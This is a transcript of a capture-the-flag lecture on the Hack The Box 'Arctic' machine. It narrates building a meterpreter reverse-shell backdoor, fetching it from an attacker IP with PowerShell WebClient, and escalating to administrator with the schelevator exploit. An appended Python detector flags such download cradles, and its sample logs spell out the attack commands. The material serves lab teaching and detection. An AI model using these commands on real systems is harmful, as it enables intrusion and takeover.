1 00:00:00,600 --> 00:00:07,050 Hi, within this lecture, we're going to try and escalate our privilege, so in order to do that,
2 00:00:07,050 --> 00:00:08,900 I'm going to show you a new technique.
3 00:00:09,360 --> 00:00:19,500 So if you come over here with a shell, then you can try to actually escalate your shell into a meterpreter
4 00:00:19,500 --> 00:00:26,580 shell anyway, because, as you know, we tried to get a meterpreter shell, but we actually tried
5 00:00:26,580 --> 00:00:28,500 to discover a way to get that.
6 00:00:28,680 --> 00:00:30,600 But we haven't found it yet.
7 00:00:30,900 --> 00:00:35,150 But since now we are inside of the network, we hacked into the machine.
8 00:00:35,430 --> 00:00:43,970 Then we can try to create a new shell and upload it over here and get a meterpreter back.
9 00:00:44,280 --> 00:00:48,390 And by the way, I just mean a regular backdoor.
10 00:00:49,050 --> 00:00:51,290 OK, so how do we do it?
11 00:00:51,720 --> 00:00:56,240 We can create one easily with msfvenom, right?
12 00:00:56,580 --> 00:01:02,650 We can come over here and just run msfvenom with a meterpreter payload like windows
13 00:01:02,650 --> 00:01:05,940 meterpreter reverse TCP as usual.
14 00:01:06,300 --> 00:01:11,370 OK, and I'm going to give the LHOST and LPORT as usual.
15 00:01:11,700 --> 00:01:15,870 And for the LPORT I'm going to choose something other than four four four four.
16 00:01:15,870 --> 00:01:20,820 I'm going to go for one, two, three, four, because we are already using that, and the format will
17 00:01:20,820 --> 00:01:28,620 be an exe, and I'm going to save it under my /var/www/html, which is my web server root, and
18 00:01:28,620 --> 00:01:31,020 I'm going to call it mybackdoor.exe.
19 00:01:31,380 --> 00:01:36,780 So this is basically a backdoor that we have seen in the complete ethical hacking course.
20 00:01:36,780 --> 00:01:43,950 If you have gotten that from us. And that's it, that's how we create a backdoor.
21 00:01:44,280 --> 00:01:49,230 So rather than sending the backdoor to a victim, we're just going to upload it ourselves.
22 00:01:49,740 --> 00:01:56,190 And in order to do that, we can use the certutil that we have seen before.
23 00:01:56,730 --> 00:02:04,470 But this time, if certutil doesn't actually run or if certutil doesn't work, I'm just going
24 00:02:04,470 --> 00:02:08,250 to show you a way to do it, an alternative way to do it as well.
25 00:02:08,670 --> 00:02:11,790 And it's done with PowerShell, OK?
26 00:02:12,090 --> 00:02:16,230 And it's a little bit of a longer command and you need to memorize it.
27 00:02:16,470 --> 00:02:18,390 So it's a little bit annoying.
28 00:02:18,390 --> 00:02:25,920 But again, it will be very helpful for you if you cannot download a file with certutil.
29 00:02:25,950 --> 00:02:28,110 You're going to have to take a note of this one.
30 00:02:28,380 --> 00:02:36,660 And I'm just going to, ah, just read it through my notes in order to write it over here.
31 00:02:36,780 --> 00:02:39,450 OK, so this is PowerShell.
32 00:02:40,110 --> 00:02:46,770 And again, PowerShell is a shell that we actually use in the Windows operating system.
33 00:02:47,110 --> 00:02:55,020 It lets us run the commands in a more powerful or more privileged way if we can actually do this.
34 00:02:55,470 --> 00:02:57,390 And of course it doesn't.
35 00:02:57,390 --> 00:03:05,040 And there you can run a lot of commands in order to effectively manage your Windows operating system.
36 00:03:05,490 --> 00:03:08,520 And so the syntax goes like this.
37 00:03:08,520 --> 00:03:11,910 I'm going to say New-Object System
38 00:03:12,090 --> 00:03:15,030 .Net.WebClient.
39 00:03:15,030 --> 00:03:22,530 OK, so this is a WebClient in order to make a request to the web, and this is exactly what we are trying
40 00:03:22,530 --> 00:03:23,010 to do.
41 00:03:23,280 --> 00:03:30,300 So we're creating a new object of the WebClient and you can just call the DownloadFile method of that
42 00:03:30,300 --> 00:03:31,830 WebClient object.
43 00:03:32,260 --> 00:03:40,770 OK, so and after that, you're going to have to specify the URL over here to download the file that
44 00:03:40,770 --> 00:03:41,970 you need to download.
45 00:03:42,180 --> 00:03:44,670 And I'm doing this with a single quotation mark.
46 00:03:44,670 --> 00:03:45,600 As you can see.
47 00:03:46,010 --> 00:03:50,970 I'm going to write my mybackdoor.exe over here; of course, you're going to have to write your
48 00:03:50,970 --> 00:03:53,340 own name and your own IP address.
49 00:03:54,000 --> 00:03:58,980 And after that, you're going to have to specify what to call it after downloading.
50 00:03:58,980 --> 00:04:05,400 So I'm going to call this mybackdoor.exe one more time and close the single quotation mark over here,
51 00:04:05,670 --> 00:04:12,600 close the parentheses and close the double quotation mark that we have opened before.
52 00:04:13,140 --> 00:04:16,790 So the syntax has to be exactly like this.
53 00:04:17,220 --> 00:04:25,140 OK, so over here we're creating a new WebClient and using the DownloadFile method of that WebClient
54 00:04:25,380 --> 00:04:28,550 in order to make a request to this mybackdoor.exe.
55 00:04:28,590 --> 00:04:30,230 And after that, we're going to save it.
56 00:04:30,690 --> 00:04:35,760 Now, if I run this, it can actually download this and save it.
57 00:04:36,030 --> 00:04:41,700 And by the way, if it doesn't work over here, you can try to go into the temp folder and try over
58 00:04:41,700 --> 00:04:42,210 there.
59 00:04:42,540 --> 00:04:48,630 But as you can see, I believe it's working, or it's trying to work.
60 00:04:48,930 --> 00:04:51,230 It's downloading that exe file.
61 00:04:51,630 --> 00:04:55,110 Let me try and see if it is going to work or not.
62 00:04:55,440 --> 00:04:56,640 And again, sometimes
63 00:04:56,650 --> 00:04:58,500 certutil doesn't let you do that.
64 00:04:58,500 --> 00:04:59,910 And this PowerShell will.
65 00:05:00,440 --> 00:05:09,110 So it's good to know both of them, so take note of this command and also the certutil command
66 00:05:09,440 --> 00:05:12,660 as well, like the broadcasting that we have seen before.
67 00:05:13,190 --> 00:05:15,230 Now, here you go.
68 00:05:15,260 --> 00:05:16,900 I believe now it's done.
69 00:05:16,910 --> 00:05:18,410 It took a while.
70 00:05:18,810 --> 00:05:21,700 I'm going to run dir and here you go.
71 00:05:21,710 --> 00:05:27,590 Now we see mybackdoor.exe, and after completion, maybe you're going to have to hit enter
72 00:05:27,590 --> 00:05:29,200 in order to trigger it a little bit.
73 00:05:29,630 --> 00:05:35,360 Now, I'm going to run msfconsole because we're going to create another listener for us, this
74 00:05:35,360 --> 00:05:40,010 time with the meterpreter payload, so that we can get a meterpreter back.
75 00:05:40,520 --> 00:05:46,430 And if we get the meterpreter shell back, we can easily run the post-exploit modules.
76 00:05:46,430 --> 00:05:56,110 So that's why I'm having this hard time over here, OK, so that it can make our job very easy afterwards.
77 00:05:56,420 --> 00:05:58,760 So I'm going to set my payload to windows
78 00:05:58,790 --> 00:06:00,440 meterpreter reverse TCP.
79 00:06:00,770 --> 00:06:06,560 If you say show options, you will see that you're going to have to write the LHOST, and of course we're
80 00:06:06,570 --> 00:06:09,440 going to have to change the LPORT as well to one, two, three, four.
81 00:06:09,770 --> 00:06:18,890 I'm going to exploit this in the background, and now I'm going to run mybackdoor.exe from the Windows
82 00:06:18,890 --> 00:06:19,580 over here.
83 00:06:20,000 --> 00:06:20,900 And here you go.
84 00:06:20,900 --> 00:06:22,070 We have the back.
85 00:06:22,430 --> 00:06:29,000 So I'm going to hit enter and interact with that session, and it has to be sessions.
86 00:06:29,390 --> 00:06:30,190 Here you go.
87 00:06:30,200 --> 00:06:36,860 Now, if I say getuid, we are tolis one more time, but this time we have the meterpreter session.
88 00:06:37,160 --> 00:06:43,590 So if I run sysinfo you will see that I have the current connection with the active Windows.
89 00:06:43,940 --> 00:06:44,630 Very good.
90 00:06:44,660 --> 00:06:46,640 Now again, we did the same thing.
91 00:06:46,640 --> 00:06:50,660 We did not escalate our privilege, but this time we escalated our shell.
92 00:06:51,020 --> 00:06:54,140 So we are in a Windows meterpreter, right.
93 00:06:54,140 --> 00:06:59,900 If I say shell, I can go back to the shell that we were currently in, but this time in the
94 00:06:59,960 --> 00:07:00,650 meterpreter.
95 00:07:00,650 --> 00:07:07,970 I can run run post multi over here and recon and local exploit
96 00:07:07,970 --> 00:07:13,820 suggester, not exploit but exploit suggester over here.
97 00:07:14,480 --> 00:07:15,320 Great.
98 00:07:15,320 --> 00:07:20,750 Now if I run this, it automatically collects all the data regarding these exploits.
99 00:07:20,750 --> 00:07:25,040 I just use it and it will display some results back to us.
100 00:07:25,610 --> 00:07:27,380 And here you go.
101 00:07:27,380 --> 00:07:31,610 It will try the 34 exploit checks.
102 00:07:31,610 --> 00:07:32,420 Great.
103 00:07:33,140 --> 00:07:38,720 Now we see some of the things that we have seen before over here, like schelevator.
104 00:07:39,290 --> 00:07:45,890 And yeah, we have the MS16-075 reflection here as well.
105 00:07:46,430 --> 00:07:51,170 This time I'm going to go for the schelevator because, as I said before, this is one of the most popular
106 00:07:51,170 --> 00:07:52,850 ones and we haven't seen it yet.
107 00:07:53,360 --> 00:08:00,560 So if you go over here to Google.com and search for schelevator yourselves, then you are going to see
108 00:08:01,010 --> 00:08:01,880 the Task
109 00:08:01,880 --> 00:08:05,000 Scheduler XML Privilege Escalation thingy.
110 00:08:05,450 --> 00:08:07,160 So go into the Rapid7 one.
111 00:08:07,160 --> 00:08:09,740 Of course you can go for the other ones here as well.
112 00:08:10,700 --> 00:08:15,980 You can just see the descriptions over here as well as the usage as well.
113 00:08:16,010 --> 00:08:22,850 OK, so it seems that we can run this on both architectures like 32 bit, 64 bit.
114 00:08:23,260 --> 00:08:28,580 It says that it's collecting the local exploits for 32 bit over here, but our architecture seems
115 00:08:28,580 --> 00:08:30,230 to be 64 bit.
116 00:08:30,800 --> 00:08:34,670 So I don't know whether it's going to cause any problems or not.
117 00:08:34,670 --> 00:08:38,690 But we can easily try this, right, because we already have the module over here.
118 00:08:38,930 --> 00:08:41,510 All you got to do is just copy this, OK?
119 00:08:41,840 --> 00:08:44,960 And I say use in a meterpreter session.
120 00:08:45,410 --> 00:08:53,170 And of course, we have to just background this and then we can say use in the Metasploit section,
121 00:08:53,180 --> 00:08:54,890 not in the meterpreter section.
122 00:08:55,790 --> 00:09:02,420 So when you do that, if you run show options, you will see that you're going to have to set the session
123 00:09:02,420 --> 00:09:03,710 and our session is one.
124 00:09:04,310 --> 00:09:08,750 So I'm going to set the LHOST to 10.10.14.19.
125 00:09:09,140 --> 00:09:14,220 And for the LPORT, I'm going to choose something that we have never used before, or 555.
126 00:09:14,870 --> 00:09:15,800 Here you go.
127 00:09:15,830 --> 00:09:17,510 I'm going to run exploit and see.
128 00:09:18,320 --> 00:09:18,770 Yep.
129 00:09:18,770 --> 00:09:22,730 It says that there's a problem over here.
130 00:09:22,730 --> 00:09:27,020 It says to try using an x64 meterpreter.
131 00:09:27,440 --> 00:09:29,810 It's very good that we get this error back.
132 00:09:29,810 --> 00:09:35,540 As you can see, it asks for a specific version of the environment over here.
133 00:09:35,540 --> 00:09:41,690 So we're going to have to be in the x64 environment, and we can try to switch it.
134 00:09:41,990 --> 00:09:43,490 So we haven't seen that before.
135 00:09:43,490 --> 00:09:45,770 So this is a great opportunity for us.
136 00:09:45,770 --> 00:09:47,510 So I'm going to go into the session one.
137 00:09:48,440 --> 00:09:53,270 So I'm going to say getuid, or sysinfo rather than getuid.
138 00:09:53,510 --> 00:09:59,630 We see that the architecture is already x64, but I believe our session is in the
139 00:09:59,700 --> 00:10:01,440 x86. OK.
140 00:10:01,530 --> 00:10:07,440 As you can see, the meterpreter is in the 32 bit, so that's what's causing the
141 00:10:07,440 --> 00:10:08,190 problems.
142 00:10:08,880 --> 00:10:15,530 So what we can do, we can try to migrate our process into something 64 bit.
143 00:10:16,260 --> 00:10:23,280 So in order to do that, you're going to have to display the processes that are currently running
144 00:10:23,280 --> 00:10:25,110 over here with the ps command.
145 00:10:26,190 --> 00:10:31,890 So if you run the ps command, you can see all the process lists in the Windows operating system.
146 00:10:32,010 --> 00:10:39,150 And as you can see, our cmd is the x86, which is 32 bit over here.
147 00:10:39,450 --> 00:10:46,020 We're going to have to migrate it into something else, something like 64 bit over here.
148 00:10:46,440 --> 00:10:52,860 Maybe we can just go into this one, jrun.exe, which is the ColdFusion.
149 00:10:53,220 --> 00:11:00,900 So all you've got to do is just migrate 1184, which is the PID, OK, and if it doesn't work, you
150 00:11:00,900 --> 00:11:04,550 can try to go into other 64 bit ones as well.
151 00:11:05,340 --> 00:11:08,550 But this is, I believe this worked very well.
152 00:11:09,040 --> 00:11:15,720 Now, if you have gotten the complete ethical hacking course, you know what it means to migrate
153 00:11:15,720 --> 00:11:16,200 over here.
154 00:11:16,200 --> 00:11:21,940 And as you can see, the meterpreter is now in the 64 bit as well.
155 00:11:22,410 --> 00:11:27,030 So we generally do this migration in order to persist our session.
156 00:11:27,210 --> 00:11:36,030 But this time we did it in order to go into a 64 bit session, which is most of the time much more stable,
157 00:11:36,030 --> 00:11:36,610 by the way.
158 00:11:37,260 --> 00:11:43,460 Now, I'm going to come over here and say show options to the schelevator.
159 00:11:43,500 --> 00:11:48,210 The session is still in one, LHOST and LPORT are still OK.
160 00:11:48,240 --> 00:11:49,470 I'm going to run the exploit.
161 00:11:49,800 --> 00:11:52,020 And this time, as you can see, it's working.
162 00:11:52,170 --> 00:11:56,130 It didn't complain about the 64 bit thingy.
163 00:11:56,640 --> 00:11:58,590 And now I'm going to say getuid.
164 00:11:58,590 --> 00:11:59,430 And here you go.
165 00:11:59,520 --> 00:12:00,660 Now we are root.
166 00:12:00,660 --> 00:12:01,980 We are administrator.
167 00:12:02,460 --> 00:12:05,010 So we managed to escalate our privileges.
168 00:12:05,400 --> 00:12:13,620 So if I run pwd, I'm in the System32, I'm going to go back and let me run pwd, I'm in the C
169 00:12:13,980 --> 00:12:20,490 I'm going to go into the Users and I'm going to run ls to see the Administrator folder over here.
170 00:12:20,490 --> 00:12:27,900 I'm going to go into the Administrator and if I run ls I can see all the things regarding the Administrator,
171 00:12:27,900 --> 00:12:33,930 I'm going to go into the Desktop because that's where we find the root flag in the Hack The Box.
172 00:12:33,970 --> 00:12:37,320 OK, I'm going to cat this thing out and here you go.
173 00:12:37,350 --> 00:12:39,270 We managed to get the root flag.
174 00:12:39,870 --> 00:12:42,510 So this is how you hack the Arctic.
175 00:12:42,870 --> 00:12:49,830 Again, this is not a very good CTF because we're going to have to wait like ten seconds before we do
176 00:12:49,830 --> 00:12:50,430 anything.
177 00:12:50,670 --> 00:12:53,070 But again, it teaches us a lot.
178 00:12:53,250 --> 00:12:56,610 And we haven't seen this schelevator, or we haven't seen the migration.
179 00:12:56,610 --> 00:13:01,230 We haven't seen a lot of things in the section that we haven't covered before.
180 00:13:01,230 --> 00:13:04,110 So that's why we have chosen to do this.
181 00:13:04,590 --> 00:13:05,760 So far, so good.
182 00:13:05,760 --> 00:13:07,880 I hope you enjoyed this section.
183 00:13:08,070 --> 00:13:10,470 See you in the next one for closing.
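As an added example that is not part of the lecture, here is the defender's counterpart to the two file-download techniques the lecture uses (PowerShell's System.Net.WebClient and certutil): a small Python detector run over constructed PowerShell script-block and process-creation log lines. The record layout, the rule names and the detect_download_cradles function are my own assumptions rather than any product's schema; the host 10.10.14.19 and mybackdoor.exe reuse the lecture's values.

```python
import re

# Constructed sample records (not from the lecture): "<event id> <image> <command text>",
# one per line, in the shape of PowerShell script-block (4104) and process-creation
# (4688) events. The host 10.10.14.19 and mybackdoor.exe reuse the lecture's values.
SAMPLE_LOG = """\
4104 powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.19/mybackdoor.exe','mybackdoor.exe')
4688 certutil.exe certutil -urlcache -f http://10.10.14.19/mybackdoor.exe mybackdoor.exe
4104 powershell.exe Get-ChildItem C:\\Users | Sort-Object Name
4104 powershell.exe $wc = New-Object Net.WebClient; $wc.DownloadString('https://example.invalid/x.ps1')
4688 certutil.exe certutil -verify cert.cer
"""

# One rule per download technique the lecture uses. The WebClient rule also covers
# DownloadString, the same object used to fetch a script without writing it to disk.
RULES = [
    ("powershell_webclient_download",
     re.compile(r"New-Object\s+(System\.)?Net\.WebClient.*?\.(DownloadFile|DownloadString)\s*\(", re.I)),
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(\.exe)?\b.*?\s-urlcache\b", re.I)),
]

URL_RE = re.compile(r"""https?://[^\s'")]+""", re.I)


def detect_download_cradles(log_text):
    """Return (line_number, rule_name, url) for every line that matches a rule.

    url is the first http(s) URL on the line (the source a responder will want
    to block and hunt for elsewhere), or None if the line carries no URL."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                m = URL_RE.search(line)
                hits.append((lineno, name, m.group(0) if m else None))
                break  # one finding per line is enough
    return hits


if __name__ == "__main__":
    for hit in detect_download_cradles(SAMPLE_LOG):
        print(hit)
```

Lines 3 and 5 of the sample are benign uses of the same binaries and produce no finding, which is the point of matching on the download verbs rather than on the image name alone.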